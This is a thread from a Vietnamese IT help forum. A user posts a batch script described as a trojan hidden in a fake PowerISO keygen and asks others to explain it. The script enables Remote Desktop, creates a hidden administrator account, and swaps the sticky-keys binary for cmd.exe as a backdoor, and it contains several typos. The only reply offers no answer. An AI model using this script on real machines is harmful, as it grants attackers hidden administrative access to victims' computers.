Hỏi đáp mọi chủ đề liên qua đến công nghệ thông tin, internet, lập trình, SEO...
Nội quy chuyên mục: Hỏi đáp mọi chủ đề liên qua đến công nghệ thông tin, internet, lập trình, SEO...

- Chuyên nhận giải đáp thắc mắc sử dụng Word, Excel, Power Point

- Ai cần download driver hay Firmware cho máy tính máy in, thì vào đây nhé, tìm gì cũng có Driver 360

- Cập nhật tin tức với Mr Công nghệ tại đây
By thiendia9000
#618454 Chào mọi người!

Hiện tại mình đang tập tành tìm hiểu về virut có ai hiểu đoạn code này giải thích giùm mình với ạ

Đây là 1 đoạn code mình tìm được là trojan netcat khi tấn xâm nhập máy tính của victim bằng cách gửi 1 phần mềm PowerISO qua mail trong đó có 2 keygne nhưng 1 key thực đã ẩn đi và key giả là trojan

khi kích hoạt thì key thật hoạt động đồng thời trojan cũng hoạt động


@echo off

start PowerISO-key.exe

if exist sethc.exe.suriv goto else goto hack

:hack

TAKEOWN /F C:\windows\Sytem32\sethc.exe

TAKEOWN /F C:\windows\Sytem32\cmd.exe

reg add "HKEY_LOCAL_MACHINE\sYSTEM\Currentcontrolset\Contr ol\Terminal Sever" /v fDenyTSconnections /t REG_DWORD /d "0" /f

net user su forever /add

net localgroup administrators su /add

cd /d C:\Windows\System32

icacls sethc.exe /grant administrators:F

icacls cmd.exe /grant administrators:F

rename sethc.exe sethc.exe.suriv

icals sethc.exe.suriv /dent adminitrators:F

copy cmd.exe sethc.exe /y

reg add "HKEY_LOCAL_MACHINE\Software\Micosoft\WindowsNT\cu rrentVerison\Winlogon\SpecialAccounts\userList" /v SU /t REG_DWORD /d "0" /f

:exit

Mình cứ thắc mắc k biết đây có phải là 1 con trojan thực sự không!

Ai biết được đoạn code này chỉ mình với!

Thank mọi người nhiều
By Tennyson
#618463 Cái này em bó tay. Lót gạch ngóng reply của các bạn để học hỏi kakaka
Kết nối đề xuất: